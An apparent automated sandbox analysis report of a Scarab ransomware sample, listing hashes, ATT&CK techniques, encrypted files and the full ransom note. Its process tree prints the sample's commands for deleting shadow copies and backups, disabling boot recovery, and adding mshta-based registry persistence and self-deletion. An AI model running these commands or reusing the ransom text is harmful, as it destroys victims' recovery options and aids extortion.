84bebbe2cc14519a656dd6ee54e892191872f7122ebf53ef6b2349a5218c11e1

Resubmissions

18-07-2024 07:25

240718-h84wjs1hpb 10

18-07-2024 07:19

240718-h51pqa1gng 10

17-07-2024 20:55

240717-zqkhmaydmq 10

17-07-2024 19:21

240717-x2pwdaycjb 10

Analysis

max time kernel
150s
max time network
129s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
17-07-2024 20:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Scarab.exe
Size

342KB
MD5

6899003aaa63ab4397f9e32e0a1daf43
SHA1

c22272ff0944d127992b393562871473b23ef8ea
SHA256

53f73dc2e8af9c059136029b3b535e885d4452d3375586eb9a0336d7a389aad5
SHA512

d8895f96e12d1b0b5907f7b1e7b976a37ff0cbe6db929cfbea5c931d905fb8269dc91bf44db83743920b63affc64ba88a0933d3111bc68f71ee266971b91b6bc
SSDEEP

6144:zmTLRf45/wAfqj6pjohSws+wZQtmk6LnAlnZ:eq5/tyjMLd+Rtmkc0

Score

10^/10

defense_evasion execution impact persistence privilege_escalation ransomware

Malware Config

Extracted

Path

C:\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT

Ransom Note

__________________________________________________________________________________________________ | | | *** IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS *** | |__________________________________________________________________________________________________| Your files are now encrypted! -----BEGIN PERSONAL IDENTIFIER----- pAQAAAAAAACZXavzHZSJE0MkCAR=s7zcjnGjHEzG6SnB3=7CwiTRrKduObceMexXhVNfzIpk23hNby1MWsm1qqm1nZn3tbRepRgZ pTouLdtave=Z=cjx=1iVO29Rg0NSVS7Dhu6ldatkWFlWpg+Gs5QnYl=oofUu=wnVJlN=Uk=k5mTengOi6p+dUFbF11L9C4mK=Gj+ UWTws33RSEipc15SiMBI2mGE7RwLEUhJB3rsHxJzSm6ppn=Hn4V4y6qejC0pMRajOTkLq3nSqVLtQNY5w5+etGdc5wv2sQDD5+mO QIODVuELPsJW2Wnn+izOk5NFP0RpuNUIm+=JDL7alOsBgqybZmAJFye71IN5UvDMwsGwltkswNAT4sCTUrKRvqxs7eaAYQb8p4i7 m3Vr5lvmHtW01N70uccYJQpwOIYuXgXSupVcZ856734mBloo7lAokIApRzBkaMk5OtvkMSH3UnL7qFqCDcdTHArmn95E1csf6RKN EUGh7V8E3y9AricLg8RiI3Q8ITx5ATADFO2PAkgrunECCiZmgc5L6x6PyjLLmW5K2EFggNunM2bUeHvtS9LRBw3kHzmRtJfQJcYm FF7qcgY8QIPlYFuIundcxdVolxHKtmqE=7ELFC5L0QSZJnGAu5+xaTQnMXSH40QxlIB5AlrclLRkAEGYIb15MLHiMck7+L1HLTJm sOJLjEQBZ4YpWNk1Zye4z8z0rkfoC7mDvzKSkBM9+S4aDAP2NQ7FFG=xmB7SFoA0uJornvk6bGuXNdTG3hfch2Jmj33FxiDHkJ4r AweY6eGD6tm5G631zfnG4D0ydAbnj+5HYeMdA5oRkn08Hk -----END PERSONAL IDENTIFIER----- All your files have been encrypted due to a security problem with your PC. Now you should send us email with your personal identifier. This email will be as confirmation you are ready to pay for decryption key. You have to pay for decryption in Bitcoins. The price depends on how fast you write to us. After payment we will send you the decryption tool that will decrypt all your files. Contact us using this email address: [email protected] Free decryption as guarantee! Before paying you can send us up to 3 files for free decryption. The total size of files must be less than 10Mb (non archived), and files should not contain valuable information (databases, backups, large excel sheets, etc.). __________________________________________________________________________________________________ | | | How to obtain Bitcoins? | | | | * The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click | | 'Buy bitcoins', and select the seller by payment method and price: | | https://localbitcoins.com/buy_bitcoins | | * Also you can find other places to buy Bitcoins and beginners guide here: | | http://www.coindesk.com/information/how-can-i-buy-bitcoins | | | |__________________________________________________________________________________________________| __________________________________________________________________________________________________ | | | Attention! | | | | * Do not rename encrypted files. | | * Do not try to decrypt your data using third party software, it may cause permanent data loss. | | * Decryption of your files with the help of third parties may cause increased price | | (they add their fee to our) or you can become a victim of a scam. | | | |__________________________________________________________________________________________________|

Emails

[email protected]

Signatures

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Renames multiple (234) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Deletes itself 1 IoCs

pid	Process
2744	mshta.exe

Executes dropped EXE 2 IoCs

pid	Process
2720	sevnz.exe
2552	sevnz.exe

Loads dropped DLL 2 IoCs

pid	Process
2832	Scarab.exe
2832	Scarab.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\{45E73A27-D16C-4EDB-ADE8-0C069E54AF30} = "C:\\Users\\Admin\\AppData\\Roaming\\sevnz.exe"	mshta.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2492 set thread context of 2488	2492	Scarab.exe	30
PID 2704 set thread context of 2832	2704	Scarab.exe	34
PID 2720 set thread context of 2552	2720	sevnz.exe	39

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PPKLite.api.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.STD	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\EScript.api	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif	sevnz.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm.api	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Checkers.api.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Spelling.api.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SecStoreFile.ico	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PDDom.api	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\info.gif.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\FDFFile_8.ico	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf.[[email protected]].scarab	sevnz.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\AcroRead.msi.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT	sevnz.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif.[[email protected]].scarab	sevnz.exe
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\SignHere.pdf	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annots.api.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STC.[[email protected]].scarab	sevnz.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf	sevnz.exe

Access Token Manipulation: Create Process with Token 1 TTPs 2 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
2704	Scarab.exe
2832	Scarab.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
2788	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-2660163958-4080398480-1122754539-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe
2552	sevnz.exe

Suspicious use of AdjustPrivilegeToken 43 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2292	WMIC.exe
Token: SeSecurityPrivilege	2292	WMIC.exe
Token: SeTakeOwnershipPrivilege	2292	WMIC.exe
Token: SeLoadDriverPrivilege	2292	WMIC.exe
Token: SeSystemProfilePrivilege	2292	WMIC.exe
Token: SeSystemtimePrivilege	2292	WMIC.exe
Token: SeProfSingleProcessPrivilege	2292	WMIC.exe
Token: SeIncBasePriorityPrivilege	2292	WMIC.exe
Token: SeCreatePagefilePrivilege	2292	WMIC.exe
Token: SeBackupPrivilege	2292	WMIC.exe
Token: SeRestorePrivilege	2292	WMIC.exe
Token: SeShutdownPrivilege	2292	WMIC.exe
Token: SeDebugPrivilege	2292	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2292	WMIC.exe
Token: SeRemoteShutdownPrivilege	2292	WMIC.exe
Token: SeUndockPrivilege	2292	WMIC.exe
Token: SeManageVolumePrivilege	2292	WMIC.exe
Token: 33	2292	WMIC.exe
Token: 34	2292	WMIC.exe
Token: 35	2292	WMIC.exe
Token: SeBackupPrivilege	2212	vssvc.exe
Token: SeRestorePrivilege	2212	vssvc.exe
Token: SeAuditPrivilege	2212	vssvc.exe
Token: SeIncreaseQuotaPrivilege	2292	WMIC.exe
Token: SeSecurityPrivilege	2292	WMIC.exe
Token: SeTakeOwnershipPrivilege	2292	WMIC.exe
Token: SeLoadDriverPrivilege	2292	WMIC.exe
Token: SeSystemProfilePrivilege	2292	WMIC.exe
Token: SeSystemtimePrivilege	2292	WMIC.exe
Token: SeProfSingleProcessPrivilege	2292	WMIC.exe
Token: SeIncBasePriorityPrivilege	2292	WMIC.exe
Token: SeCreatePagefilePrivilege	2292	WMIC.exe
Token: SeBackupPrivilege	2292	WMIC.exe
Token: SeRestorePrivilege	2292	WMIC.exe
Token: SeShutdownPrivilege	2292	WMIC.exe
Token: SeDebugPrivilege	2292	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2292	WMIC.exe
Token: SeRemoteShutdownPrivilege	2292	WMIC.exe
Token: SeUndockPrivilege	2292	WMIC.exe
Token: SeManageVolumePrivilege	2292	WMIC.exe
Token: 33	2292	WMIC.exe
Token: 34	2292	WMIC.exe
Token: 35	2292	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2492 wrote to memory of 2488	2492	Scarab.exe	30
PID 2492 wrote to memory of 2488	2492	Scarab.exe	30
PID 2492 wrote to memory of 2488	2492	Scarab.exe	30
PID 2492 wrote to memory of 2488	2492	Scarab.exe	30
PID 2492 wrote to memory of 2488	2492	Scarab.exe	30
PID 2492 wrote to memory of 2488	2492	Scarab.exe	30
PID 2492 wrote to memory of 2488	2492	Scarab.exe	30
PID 2492 wrote to memory of 2488	2492	Scarab.exe	30
PID 2492 wrote to memory of 2488	2492	Scarab.exe	30
PID 2492 wrote to memory of 2488	2492	Scarab.exe	30
PID 2492 wrote to memory of 2488	2492	Scarab.exe	30
PID 2492 wrote to memory of 2488	2492	Scarab.exe	30
PID 2492 wrote to memory of 2488	2492	Scarab.exe	30
PID 2488 wrote to memory of 2740	2488	Scarab.exe	31
PID 2488 wrote to memory of 2740	2488	Scarab.exe	31
PID 2488 wrote to memory of 2740	2488	Scarab.exe	31
PID 2488 wrote to memory of 2740	2488	Scarab.exe	31
PID 2488 wrote to memory of 2704	2488	Scarab.exe	33
PID 2488 wrote to memory of 2704	2488	Scarab.exe	33
PID 2488 wrote to memory of 2704	2488	Scarab.exe	33
PID 2488 wrote to memory of 2704	2488	Scarab.exe	33
PID 2704 wrote to memory of 2832	2704	Scarab.exe	34
PID 2704 wrote to memory of 2832	2704	Scarab.exe	34
PID 2704 wrote to memory of 2832	2704	Scarab.exe	34
PID 2704 wrote to memory of 2832	2704	Scarab.exe	34
PID 2704 wrote to memory of 2832	2704	Scarab.exe	34
PID 2704 wrote to memory of 2832	2704	Scarab.exe	34
PID 2704 wrote to memory of 2832	2704	Scarab.exe	34
PID 2704 wrote to memory of 2832	2704	Scarab.exe	34
PID 2704 wrote to memory of 2832	2704	Scarab.exe	34
PID 2704 wrote to memory of 2832	2704	Scarab.exe	34
PID 2704 wrote to memory of 2832	2704	Scarab.exe	34
PID 2704 wrote to memory of 2832	2704	Scarab.exe	34
PID 2704 wrote to memory of 2832	2704	Scarab.exe	34
PID 2832 wrote to memory of 2888	2832	Scarab.exe	35
PID 2832 wrote to memory of 2888	2832	Scarab.exe	35
PID 2832 wrote to memory of 2888	2832	Scarab.exe	35
PID 2832 wrote to memory of 2888	2832	Scarab.exe	35
PID 2832 wrote to memory of 2720	2832	Scarab.exe	37
PID 2832 wrote to memory of 2720	2832	Scarab.exe	37
PID 2832 wrote to memory of 2720	2832	Scarab.exe	37
PID 2832 wrote to memory of 2720	2832	Scarab.exe	37
PID 2832 wrote to memory of 2744	2832	Scarab.exe	38
PID 2832 wrote to memory of 2744	2832	Scarab.exe	38
PID 2832 wrote to memory of 2744	2832	Scarab.exe	38
PID 2832 wrote to memory of 2744	2832	Scarab.exe	38
PID 2720 wrote to memory of 2552	2720	sevnz.exe	39
PID 2720 wrote to memory of 2552	2720	sevnz.exe	39
PID 2720 wrote to memory of 2552	2720	sevnz.exe	39
PID 2720 wrote to memory of 2552	2720	sevnz.exe	39
PID 2720 wrote to memory of 2552	2720	sevnz.exe	39
PID 2720 wrote to memory of 2552	2720	sevnz.exe	39
PID 2720 wrote to memory of 2552	2720	sevnz.exe	39
PID 2720 wrote to memory of 2552	2720	sevnz.exe	39
PID 2720 wrote to memory of 2552	2720	sevnz.exe	39
PID 2720 wrote to memory of 2552	2720	sevnz.exe	39
PID 2720 wrote to memory of 2552	2720	sevnz.exe	39
PID 2720 wrote to memory of 2552	2720	sevnz.exe	39
PID 2720 wrote to memory of 2552	2720	sevnz.exe	39
PID 2552 wrote to memory of 1992	2552	sevnz.exe	40
PID 2552 wrote to memory of 1992	2552	sevnz.exe	40
PID 2552 wrote to memory of 1992	2552	sevnz.exe	40
PID 2552 wrote to memory of 1992	2552	sevnz.exe	40
PID 2552 wrote to memory of 1612	2552	sevnz.exe	42

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\Scarab.exe
"C:\Users\Admin\AppData\Local\Temp\Scarab.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2492
- C:\Users\Admin\AppData\Local\Temp\Scarab.exe
  "C:\Users\Admin\AppData\Local\Temp\Scarab.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2488
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\Scarab.exe" "C:\Users\Admin\AppData\Roaming\sevnz.exe"
    3⤵
    PID:2740
- - C:\Users\Admin\AppData\Local\Temp\Scarab.exe
    "C:\Users\Admin\AppData\Local\Temp\Scarab.exe" runas
    3⤵
    - Suspicious use of SetThreadContext
    - Access Token Manipulation: Create Process with Token
    - Suspicious use of WriteProcessMemory
    PID:2704
  - - C:\Users\Admin\AppData\Local\Temp\Scarab.exe
      "C:\Users\Admin\AppData\Local\Temp\Scarab.exe" runas
      4⤵
      Loads dropped DLL
      Access Token Manipulation: Create Process with Token
      Suspicious use of WriteProcessMemory
      PID:2832
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\Scarab.exe" "C:\Users\Admin\AppData\Roaming\sevnz.exe"
        5⤵
        
        PID:2888
    - - C:\Users\Admin\AppData\Roaming\sevnz.exe
        
        "C:\Users\Admin\AppData\Roaming\sevnz.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:2720
      - C:\Users\Admin\AppData\Roaming\sevnz.exe
        
        "C:\Users\Admin\AppData\Roaming\sevnz.exe"
        6⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2552
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta.exe "javascript:o=new ActiveXObject('WScript.Shell');x=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{i=x.GetFile('sevnz.exe').Path;o.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\{45E73A27-D16C-4EDB-ADE8-0C069E54AF30}',i);}catch(e){}},10);"
        7⤵
        Adds Run key to start application
        Modifies Internet Explorer settings
        
        PID:1992
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0
        7⤵
        
        PID:1612
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic SHADOWCOPY DELETE
        7⤵
        
        PID:2036
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic SHADOWCOPY DELETE
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2292
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /All /Quiet
        7⤵
        
        PID:1764
        
        C:\Windows\SysWOW64\vssadmin.exe
        
        vssadmin Delete Shadows /All /Quiet
        8⤵
        Interacts with shadow copies
        
        PID:2788
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No
        7⤵
        
        PID:264
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
        7⤵
        
        PID:696
    - - C:\Windows\SysWOW64\mshta.exe
        
        mshta.exe "javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('Scarab.exe');close()}catch(e){}},10);"
        5⤵
        Deletes itself
        Modifies Internet Explorer settings
        
        PID:2744

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2212

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Direct Volume Access

T1006

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT

Filesize
4KB

MD5
284eb16cc9c3372019abd1cca41c72a6

SHA1
241ec1a024e7b99e912d6c4f589891270ad36ef4

SHA256
c808bb9a7a306877c139f7125212c562c644b7b6314d831f30fdc12554b1de37

SHA512
7623d45f6dcd1fc1e38a3c9017d679d097444cf690e812ccf57a28185a992a83acd8e50994af2b5236d05f372f2ff2ad7296256cdef0f871709f45e50169939d

Download Submit
C:\Users\Admin\AppData\Roaming\sevnz.exe

Filesize
342KB

MD5
6899003aaa63ab4397f9e32e0a1daf43

SHA1
c22272ff0944d127992b393562871473b23ef8ea

SHA256
53f73dc2e8af9c059136029b3b535e885d4452d3375586eb9a0336d7a389aad5

SHA512
d8895f96e12d1b0b5907f7b1e7b976a37ff0cbe6db929cfbea5c931d905fb8269dc91bf44db83743920b63affc64ba88a0933d3111bc68f71ee266971b91b6bc

Download Submit
memory/2488-12-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/2488-18-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/2488-4-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/2488-6-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/2488-17-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/2488-15-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2488-14-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/2488-2-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/2488-10-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/2488-8-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/2488-20-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/2488-21-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
memory/2488-24-0x0000000000400000-0x0000000000441000-memory.dmp

Filesize
260KB

Download
